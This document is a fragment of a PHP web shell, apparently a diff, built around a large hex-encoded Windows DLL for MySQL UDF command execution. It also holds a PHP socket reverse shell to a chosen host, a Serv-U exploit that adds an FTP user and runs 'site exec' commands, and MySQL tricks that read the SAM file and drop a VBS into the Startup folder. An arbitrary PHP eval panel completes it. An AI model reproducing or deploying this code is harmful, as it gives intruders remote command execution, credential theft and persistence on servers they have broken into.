E04030C141C24871160D1373F1F164DD37505500358687C3FAB2F4A003E1CCCA0022F907956F6C112883F1594D9815DE874095900FE37ABC645FF10EB0B8065FF8DECFC0FC0861A806811F6C540750839B72F455328E48B4DFF806A83C15E02056083236DC3DE2374001680E1A4C3F96C01175510100840EB07F60D4A30797FF810742604ADB7F2F220741830740A5074897505216A16A21521020C2ABD7CDF060389F0BA00077D0423CABF54B47F037D3BC87F31742A3BCB43C3ED4AB06D195433744D0739BA91AD85CC43F84C0804BAA67B7B435AF8EB3E26052F070643CE806F1E3BCA7423C2163CDD1188188F4F5B3B0507E69EE00113FDBEFEFF32FC5DF4C77413368E54F7D1234D143737B8DB1172A840C581CE1F0FF601F6ED63DBB7C4DE020BF7A8DF081408EB0AA8115D2CBDB1060B1068ADD8233BD39241E0DF751AE918016D0D8231816ABFB78D0A9E2DA82BCEF008022D6030EA3BAC39BF4213628561325256E8B383459875090A18EBD8D583F9B19A4DFF40EB09AF08146C410F78473159812781D6C68A11C380C901C630045A8452C9C2DD05BEFF0B48884CBD7578EA7473F606818116F502746D8B945DA2220B1E8B067519FC35008FBE813883E94B1D2A1759D888B60DBCEB584213E2137C677E2511335669A116807D131A11825F178CF015554445E2811980C73E5A74B52DD81C2EAF737808AB60072DDC07808B8C4E8BF390E005C916713F8005431467736A081E8233918B09570441464E600F3B32B24C245B231A0EF2F2B64D79D50D04FEEB08FDEB03F4C11A824C0C5F198A1141AA1EEC1BF16488174762EEEB05838C00F0D32401119C2CCBC983C1E134271208006DCC6AC738682DD9D2D96608C6C3000C085DC049B38807CA185A1965872312F52A65520945A9F88959AC913859A6E80AB82C06F651FAD756F29B6A0A8FD2268988391874744617CAE630428A78A9E850538B58DA71F0D73BC6CC214D628386A240C893715963FF25DAE2BF94603975E8F3ABAA895D0F6C16E8D386EBD77DEEB8BC4DEFDD405B2B04D30CAFCBB641FFE87BA312CA300F87942588CD546C9CD28DEEE356F7E58D614F6F52F3AB04AA8D9E94FA52A15498BCB6DE2C8A5101E84B51844B5CFA3BC777B7EFEE2D68FC8A922080089047401376F5F84BB1F04141803965D47983C308837DFC6913B93638C1E2C8914CBA6DA087F750A3A4105384898C2AB8BFDF709140A5A559A3D1A5EB5240D1B3A660810547A8C6A19EC57EF508403DFF07F153382B89357BDF06F15335250700BA49F88816ADAB00981EA84C97DFE75E2E8604AFE9508301D08C4311946FA857DA70EF65402DDFFE01A8946CBBE78FA8FF1570F814FD9635D1CBF4FC750F87DC19F6AE1CC7492DA463E7E804741704D7A628F00D740C802CB804F93CCF763605120B0811578460862571BEC01F88E1625F044CE5CF52B1404522283456A166B453962215127FE081E016CFBE8C888405ECDF7FA1150D8AC672F48A45F2C6850D20166E104D3B375A55F3B80A2D415FA0183BC1771D48BC3A08768F2A41B820008BD9CBAB6B81FA47AA42428A42FF84C15FF8EC352C900EFA8B358D7A029A33D0213989B2EF8C7DDD5A9123FD1D561E9291DD6C5634235842FCAD803DB8682E2768002E7DB75CCA8D8D726695F6C2CDEF67341503108A940564889060EFCEC9DBEB1C1A027410205BEBE380A06E6834781CDE4400BFEB491ADB0D1315DA417219045AB2BC8DFDC34BC880C1208888491F1D617213C3DE9CBC7A770E20E920EBE04C77F915774ABE5EC97394886AFDA90210F970505C59FC94882F1FD575798FAC426866281854FAF7403D6709FC161C57FFD664BEDB29FA297450100CC7D7BE5DA0F85714B00C06B45B99A0BB88CD16FFD0D602DEE66BED10B405531104EE1590601D4D0AC00982FA8659A057040481282056B064F0BB470B0C85965E91F983FA982DE9ED6A47C025152BD16075FA9AEF10D06D020610CA1A251C8E1D1429168F58A6EB3A06234AE2EB8807351E94CC5289365A271ACF0D56AF1235140FCBFFE1C3A0B7AC99AD78F2971B180A0360B615DCC1A8F1223E1975EF13A0876A064F4AACEC508B9E1D9C345CE66D442C51681C4C147D452E6AB6AD50293F89B1C1E0939D084B1A6606AB9F44BC3805750BBB0D416F064D6B50AF256BBC5C487D469512980708D0E250853014526D2FD050BCDE1BF6034EBC05A908D81A4A8615B06F126945FCDE30A22DC25B53C366A035AADB9C65F874E144346021CE0C29800750A09543B566401343E0E0043812F107C406F98A4804657FAB99A5DF89084B1D8A40053C0A84BED01D154D1088E4078D53010F8B459718C682050ABC160C166D515452B810448B664DDB39AD976865D1068F1496935166EB006D912446E98B17684D8B3D4BE1F40155F64235D144E68AE5A87CC50EE0D0F876EB3B0A81A274BBBE0C04E724FB027FAD0D03808136C85B00140C0075FFD06C0B23578A101A33AE3CD45FBB2D0D0BB443FF135A12493944BBDD2DA2182140803848068308CDCD76BF5F5EC6030D4344EB73CA2BD36E3260E7FF6A01CF0A090E683BAA479F74411ED101A2358848D12D821A85FF9D468B0F4388443105EB293B700420DEB6250CFF6305160AEB18A55E40D812FFA9193507AD9C7B77BF925B761A750D85115C74F3064942D12EE5E4AC062B4688210250A8EAA9D800F91131357540346A46C42BF87D5BF41F8AE875465757EB533038154C20629236B1F2DBCA6A711D23EB222014A660B0341B48E1FE033130EB651DBA397D147E108AB25936C514105A66B67DF436E1A11D591D161C0286D98CD9181FD84872DA478DC159D22AD3A62018366B5B0CBE3C20732EDB6CB74EC1245E0140503720CA3F408C4C793BDF0F849CD25B6CA014041B9C0324FCF25DAADB2EDE8BC441DC8367EB138DB5D751678BF026118BB5D9F6AD3867DC7466534CDC6121CB9EEB9257F44DEC1AA574A3A6884412D80A7432B06D4B6C5E0D40403E1C78B2C8663713EDD57F1EDA321C0962C321858F2065C814876515F4A1F20BD966B6B336DC895DE08B15483212BDB27DB953D6BDDF74B45664E467749C8F6AB35BA3B30E03EB068C28EDD5618F54D5CC0AB11B88108B71B77179088B2680AD9F44568D4A9E0D7FBA0DBA5580F1491AF30C5E5CC60736942B498BC24E58ED61328118B4ECAC375E2D043E3E8A515E564234632356A53C0497CFC819DF1D1B56495340CEC2C73B028658A3432D24F276607CDD1C490554CC335033E433B263345BC8945D18908DD9968D532C34201BC53619181FE0DB630AD06A15B5CB3EBB15B0107CD3DC57CC0FE16050B3EB0B83DB33ECB6119CF6112949E0565FF670C9DA1C5552F8D7B2703A84933C8AF5CC38680C42EF047AC25F9A51D4E7023A01752E0A1BB1D552F0263A613E0A431D966EE146873A4101191411035BA330D56BFDD51A75555B430BB3FFB090D3D18E016DADCA0B4301070242B5CFD6ED44E94130E01302A86658AD799AAF335BD2CAC9C14A6D42AA5BC98CCC4F56530B4A55B050009C1B201AFFAE023307420FAB0424EBF3775DFE5ABB8C90416E14460FA373F201E6E20204C420753F98FD646C3A0AF38D46FF3B9CB8ACF87B5643BE51EEB60E56485481DF4C03C12580FC8D161DDEBD0A80E17FEB0D811FDED0540440391180C980DE880A81440B8D6686C5C671D0419080E3D60AC0C006A0A8487D065C9C249E5862050D10565D7426E8BC00BF83C410E0AE41C305E3CC0CB568E12EF1C6012D415CEB030A915B4013D4B88110B5DAA5DAD2630883FB0950769225FF2F7D6B2004308819413577DA802100498A178A018878007F8B118F49473BF972F21B365341486FFF948BD6A81E588D39C470CD4143A1D03B5CCF252EB6C1FF46758A274738C474F22C419D1AE324EC85D2E1C5FE4186E00E824A6F1474D21AC0E6FFD1575F3AEB78F0FFBF34019130007F0419C0D96EE2EB15130DC9817888C2C77895FFB541599EEE9067271FD82E760B3E6A602266C4040907B742A68D38CFDA39CB15580B0318AC05224EEBFB55D0C2052241280EABE097CF0B6C112836D1E970DA0C1B1FFF804EB741B35AB6201726828ADDFFDBEE0774217F1D467BFC720638DC770202E638F809D8B517BA35C6F7750DEBD733C908023657B34D9BB9AFE582806D6AE4BF0FF35FA6ED85B50A321926EF2BB446AB2F99EE57EBB68DDE5AC3EC74230BAB1F775165EB3AC0F0596B0979D584B5634DCA0975720271FC08A5C9DE0E5FFECB030051283074512BBC2311EC1A2D75770C920F1DA2C685B7A6EB52DF2F7D8B5BB10EC11AB6D10A5601805E6EBDF54B318065FE0088508845FDF3EB09BAAB41D90DFD0F6C8D4D0AD58B1803165179AD7DD182C16E4F026B53B38059E3450A23B07465BB72251CAE5A80450F8CD5815DB9AAF5490F8FA18A46D52D1FE9DEE83C057C83760A4D405E7D2539DBD187F8787E0BD95FAD6A0AA1A1F4DEE0FE8A045823C667D9EB658B1512DA65E94CB4B6C84A740FA7DF5BD4D630AF88065D0958B60917C5522B5B13566B032CF036BE03B49F572F1A6AE0648FCC20F6AEDA06AD75A5D646D0BE05FD032C37126253CB0BC18C00885DC029C25A0BC839FAAB60287C25F7E1C29DEB025EA105B11D42030985056C351FD31EAACA3EC1CC03580000D37466AAFF0F4D53EE65DD9304DF03E50F08EC03BDE4F2B2F20F0AFF0B050CCF0AB656D003D50302017FB6DF3A1903070602100445000535300050B5EEFF7F2C20283850580708003730305750070F200BD71461DE000860686009780073AE956E08071507001A010E7D7BDDFF0028006E0075006C0129320F6E756C6C6FB7FFDF0A72756E74696D65206572726F72200F0D0A03544C4F07E4BFD95353110E0053494E470044BBFD65ED4F4D4112115236303238082D204BB76F7F7961626C746F20696E6956616C697A0D6865D67EBED961703727376E6F743D0460EFB6FF756768207370616323667B6C6F7769380AB9EC3661066F6E3736ED672079737464357075722BF6DB5AFB76697274752133A5632320630C9B42BED86C285F345F2ABDF6DA7665785C2F5806DCE2E6BEB0935F3139F76F706558313260DBEE736F0F646573632B3888706B6D4624816564193024DF405723376D926FDBADA6AC7468BF612F6C6F636B1B6C8530173464B7865B6B6E612E02A221726D0050D8DAB770406772616D204A6D366829EC852F30394F10E71A8D66412A2B302E2B84EF53C8386172677528735F6DBBF63C303266C16E6E67826F9CB52EB605743A1164E67F4DC3DB422B2D60396615566973AAEFF660FC432B2B2052A04C6962B47279276D0F87B90A2D16450E211150D8656B9CD43AC2002E003CE5ED6D736DE0252C6B6C776E3E1B17EED8F84765744C61324102766550AE75705BDBCE62130F57956426876534BEF0FF7373616765426F78410075732533322E642ADD931252EAB75956035A77CF76670B5A955A0E0B5B8E0392483AAFB9BBB56D904A0064002C204D20086DC9BDB97900632F642F06D74D03FDB5179A4144EE656D626B5B4E6F76C3FE6D930B4F986F0A536570741486A96885416C96711BBEEDF9B941076E6541F369A64D101636172763684665327533BDF7DE7B4A616E0A675F57537BAF7BEF4B47433779433F3B6EA9D0DE3323B03C6418B0ED587B4F5E095468127313D9C15A6157BC7C0C547509B9D9B1C64D251053750743F7DE7BEF3B372F27231F039E73CEB90A11181F262D9C73CEC5AF828990979E72CE39E7A5ACB3BAC1C8A78008047C28BB92975043BD384F296360A9523F4D797371909620A953A636306EC263B50B355A6A09A663B7B921E76A3752C077035C321703ABCF91FB2E746D700FB40600B6472A481D3A2C7EB53D25E4E6FFDB730A2F636D642E657865202F63200068656C55192B75313774073967FF76B6E4380B3006687474703A2F2F8F2DF5FF2ED9632D9B09CAE4C8EBB8F1CABDB4EDCEF3FFC3FE6F120D00CFC2D4D8CAA7B0DC0BCEC4BCFEB3C9B9A6F6DCE6FE21C2B7BEB6A3BA7E175C3F44867B81D10F00200593195731D913199DE4667271F0108DE8832119B2178E180F30434E5146C2F80392017BD894A007010153107C81A4B902011F0264410152476357D9D9070A2F0207743CF2E4C96C084009140A73F01093274F9EC411941270133C79E4C944180C1972E41AAC1B93274F9E741C4C783C796EF2E4C92C7A1CFC18FF86B29317D854DD038572200107402699282048001940269210841002199009810119900119108202601C16023B20EF200D0C050133164DD30C3603070418050D344DD3340609070C0832D82083090A1B0BC1BEF702573B070F575F906EB0101311031217210C32D820350F414336D86083503352175307D860830D575F597B6C17D2344D376DAB20701C72D860DF0BC72F80B3810760830C36821F83848F208334CD91299EA1830D32D8A46FA7B79FCE760EC2601FD70B18070069BEB35D0517C00B1D0490664006968D08644006648E8F9006644006919293CC066140039F78EF4D54EC25FF0204222B6027CF0EF68279822117A6DF07A1A581E9CDF3EF9FE0FC2F407E80FCA8C1A3DAA34F0D72F60881FE0740B577830C812F41B65FCFA2E43E5F21FFA21A00E5A2E8A25B7EA1FE5105BF92DFEE03DA5EDA5F5FDA6ADA32D3D8DEE0B26627B7F939317E430303860064AA432EE99E9C84538B9876840380A6699AA67C7874706C9AA6699A645C54483C34699AA6692824201C18A6699AA614100C08044DD334970075FCF8F0E4DCA6E99E35D42F75CC03C4BC9AA6699AB0A89C908C8849BEA669806C64CD2E821D65BB8C8F905C037F009EF040E82F500B807007F0F11325DCA0D1535499508BDD50C944548CF38CDC97B058592CA7BF06699A0E1EEF3B5A9775A769BAA7B5D4F3E0301AB86CD3034E6D01333AB759699AA6697796B4D3F20CDA74DD272F034D6C01F108A48008368024444144210980D109600064C15B054D734325746554B6CBB7572C0D44656C65466905410A105FDB0C470A0953C5D87393CD2719522C0A23EC4F56C145185661726961622212C0EC7F436C6F736548616E6425F62AD80E4B4A500B63417B7B56686753791D656D4447B7C1B656F5227914744E747515B893FD70496E666F413569704FB1DBD62EA845782A08535D65702CFB36CCFD56657273696F163B896E6754792D67DF856C570F1F4C434D6170115706882E610D1B4D7073ED5BC34279126F65646543688366E5ABA03DFB644F66F34C6FFD8E6B68FF300B746C556E773C3D48D767EDAC7C70416C6C0A46B1FB432D7B9BE16F6D6D09336E7DACB38556982673FB0B790CC580D866E50B56ADB521419C42494D1E263CC3D609630A532740B029DBDACA16AD147215421BC0B64C5B762B78108C8580250B77C5EB8407C4600C542FB998A170B6DA75D3F812DCDD3302524964386C7353F3B3378BDD5575650C4F09DE4BD2258C531D2D471A086D618643427552C93B2463366412A0D50CC363141E4D6F64BDA34E616D6A3B2160BC5F9EE473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"; +} + +function Mysql_m() +{ + extract($_POST); + extract($_GET); + $mysql_hostname = $mysql_hostname?$mysql_hostname : "127.0.0.1"; + $mysql_username = $mysql_username?$mysql_username : "root"; + $post_sql = $post_sql ? $post_sql : "select state(\"net user\")"; + $mysql_dbname = $mysql_dbname ? $mysql_dbname : "mysql"; + if($install){ + $link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error()); + mysql_select_db($mysql_dbname,$link) or die(mysql_error()); + @mysql_query("DROP TABLE udf_temp", $link); + $query="CREATE TABLE udf_temp (udf BLOB);"; + if(!($result=mysql_query($query, $link))) + die('error:create temp table udf_temp error.'.mysql_error()); + else + { + $code=get_code(); + $query="INSERT into udf_temp values (CONVERT($code,CHAR));"; + if(!mysql_query($query, $link)) + { + mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error()); + die('error:insert DLL error.'.mysql_error()); + } + else + { + $dllname = "mysqlDll.dll"; + if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll"; + elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll"; + + if(file_exists($dir)) { + $time = time(); + $dir = str_replace("mysqlDll","mysqlDll_$time",$dir); + $dllname = str_replace("mysqlDll","mysqlDll_$time",$dllname); + } + $query = "SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ; + if(!mysql_query($query, $link)) + { + die("export dll error:maybe dll is no priv or $dir is exists".mysql_error()); + } + else + { + echo 'install dll success'.$dir.'
    '; + } + } + mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error()); + $result = mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error()); + if($result) { + echo "install success
    back"; + exit(); + } + } +} +?> +


    +
    Host: +User: +Password: +DB: +   +
    +
    +sql statement:
    + +

    + +
    back screen:
    + +
    + + +

    + +
    reverse cmdshell with php socket;
    the extension php_sockets should be openned;
    please check phpinfo();
    code by Maple-X

    +
    +

    Host:   +Port:  

    +Linux +Win   + + + + +eof; +echo '

    '; +} +if($system=="WIN") +{ + $env=array('path' => 'c:\\windows\\system32'); +}else{ + $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); +} +$descriptorspec = array( + 0 => array("pipe","r"), + 1 => array("pipe","w"), + 2 => array("pipe","w"), + ); +$host=gethostbyname($host); +$proto=getprotobyname("tcp"); +if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0) +{ + die("Socket Create Faile"); +} +if(($ret=socket_connect($sock,$host,$port))<0) +{ + die("Connect Faile"); +}else{ +$message="----------------------PHP Connect-Back--------------------\n"; +socket_write($sock,$message,strlen($message)); +$cwd=str_replace('\\','/',dirname(__FILE__)); +while($cmd=socket_read($sock,65535,$proto)) + { + if(trim(strtolower($cmd))=="exit") + { + socket_write($sock,"Bye Bye\n"); + exit; + }else{ + +$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); +if (is_resource($process)) { + fwrite($pipes[0], $cmd); + fclose($pipes[0]); + + $msg=stream_get_contents($pipes[1]); + socket_write($sock,$msg,strlen($msg)); + fclose($pipes[1]); + + $msg=stream_get_contents($pipes[2]); + socket_write($sock,$msg,strlen($msg)); + $return_value = proc_close($process); +} + } +} +} + + } +//serv-u +function su() +{ + $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; +print<<[Exec Command] [Add User]
    +
    +
    SU_Port
    +
    SU_User
    +
    SU_Pass
    +END; +if($_GET['o'] == 'adduser') +{ +print<<Username +Password +Directory +END; +} +else +{ +print<<Command
    + + + +END; +} +echo '
    '; + if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) + { + echo '
    '; + $sendbuf = ""; + $recvbuf = ""; + $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n"; + $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n". + "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n". + "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n"; + $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; + $sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10); + $recvbuf = @fgets($sock, 1024); + echo "Data receive: $recvbuf
    "; + $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Data send: $sendbuf
    "; + $recvbuf = @fgets($sock, 1024); + echo "Data receive: $recvbuf
    "; + $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Data send: $sendbuf
    "; + $recvbuf = @fgets($sock, 1024); + echo "Data receive: $recvbuf
    "; + $sendbuf = "SITE MAINTENANCE\r\n"; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Data send: $sendbuf
    "; + $recvbuf = @fgets($sock, 1024); + echo "Data receive: $recvbuf
    "; + $sendbuf = $domain; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Data send: $sendbuf
    "; + $recvbuf = @fgets($sock, 1024); + echo "Data receive: $recvbuf
    "; + $sendbuf = $adduser; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Data send: $sendbuf
    "; + $recvbuf = @fgets($sock, 1024); + echo "Data receive: $recvbuf
    "; + if(!empty($_POST['SUCommand'])) + { + $exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10); + $recvbuf = @fgets($exp, 1024); + echo "Data receive: $recvbuf
    "; + $sendbuf = "USER ".$_POST['user']."\r\n"; + @fputs($exp, $sendbuf, strlen($sendbuf)); + echo "Data send: $sendbuf
    "; + $recvbuf = @fgets($exp, 1024); + echo "Data receive: $recvbuf
    "; + $sendbuf = "PASS ".$_POST['password']."\r\n"; + @fputs($exp, $sendbuf, strlen($sendbuf)); + echo "Data send: $sendbuf
    "; + $recvbuf = @fgets($exp, 1024); + echo "Data receive: $recvbuf
    "; + $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; + @fputs($exp, $sendbuf, strlen($sendbuf)); + echo "Data send: site exec ".$_POST["SUCommand"]."
    "; + $recvbuf = @fgets($exp, 1024); + echo "Data receive: $recvbuf
    "; + $sendbuf = $deldomain; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Data send: $sendbuf
    "; + $recvbuf = @fgets($sock, 1024); + echo "Data receive: $recvbuf
    "; + @fclose($exp); + } + @fclose($sock); + echo '
    '; + } +} + +//mysql statement + +function Mysql_n() +{ + $MSG_BOX = ' '; + $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; + if(isset($_POST['mhost']) && isset($_POST['muser'])) + { + $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; + if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); + else $MSG_BOX = 'Connect to mysql faild '; + } + $downfile = 'c:/windows/repair/sam'; + if(!empty($_POST['downfile'])) + { + $downfile = File_Str($_POST['downfile']); + $binpath = bin2hex($downfile); + $query = 'select load_file(0x'.$binpath.')'; + if($result = @mysql_query($query,$conn)) + { + $k = 0; $downcode = ''; + while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;} + $filedown = basename($downfile); + if(!$filedown) $filedown = 'b4che10r.tmp'; + $array = explode('.', $filedown); + $arrayend = array_pop($array); + header('Content-type: application/x-'.$arrayend); + header('Content-Disposition: attachment; filename='.$filedown); + header('Content-Length: '.strlen($downcode)); + echo $downcode; + exit; + } + else $MSG_BOX = 'Download file faild'; + } + $o = isset($_GET['o']) ? $_GET['o'] : ''; + Root_CSS(); +print<< +
    +
    +IP: +Port: +User: +Pass: +Dbname: +
    +
    +END; +if($o == 'u') +{ + $uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs'; + if(!empty($_POST['uppath'])) + { + $uppath = $_POST['uppath']; + $query = 'Create TABLE a (cmd text NOT NULL);'; + if(@mysql_query($query,$conn)) + { + if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));} + else{$tmp = File_Str(dirname(__FILE__)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}} + $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));'; + if(@mysql_query($query,$conn)) + { + $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; + $MSG_BOX = @mysql_query($query,$conn) ? 'upfile success' : 'upfile faild'; + } + else $MSG_BOX = 'insert into temp table faild'; + @mysql_query('Drop TABLE IF EXISTS a;',$conn); + } + else $MSG_BOX = 'create temp table faild'; + } +print<<
    Path: +

    File:  +
    +END; +} +elseif($o == 'd') +{ +print<<

    download file: +
    +END; +} +else +{ +print<< +function nFull(i){ + Str = new Array(15); + Str[0] = "select command Or input manual"; + Str[1] = "select version();"; + Str[2] = "select @@character_set_database;"; + Str[3] = "show databases;"; + Str[4] = "show tables;"; + Str[5] = "show columns from table_name;"; + Str[6] = "select @@hostname;"; + Str[7] = "select @@version_compile_os;"; + Str[8] = "select @@basedir;"; + Str[9] = "select @@datadir;"; + Str[10] = "describe table_name;"; + Str[11] = "select User,Password from mysql.user;"; + Str[12] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);"; + Str[13] = "select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;"; + Str[14] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;"; + nform.msql.value = Str[i]; + return true; +} + +
    +
    + + +END; +if(!empty($_POST['msql'])) + + { + $msql = $_POST['msql']; + if($result = @mysql_query($msql,$conn)) + { + $MSG_BOX = 'execute sql statement success
    '; + $row=mysql_fetch_row($result); + echo ''.""; + for ($i=0; $i'.mysql_field_name($result, $i).""; + } + echo ""; + mysql_data_seek($result, 0); + while ($row=mysql_fetch_row($result)) + { + echo ""; + for ($i=0; $i'."$row[$i]".''; + } + echo ""; + } + echo "
    "; + mysql_free_result($result); + } + else $MSG_BOX .= mysql_error(); + } +} + echo '
    '.$MSG_BOX.'
    '; + return true; +} + +//eval php code +function phpcode() +{ + +print<< +
    +
    user define php code:

    +
    +

    +
    + +END; + $phpcode = $_POST['phpcode']; + $phpcode = trim($phpcode); + if($phpcode){ + if (!preg_match('#<\?#si',$phpcode)){ + $phpcode = ""; + } + eval("?".">$phpcode
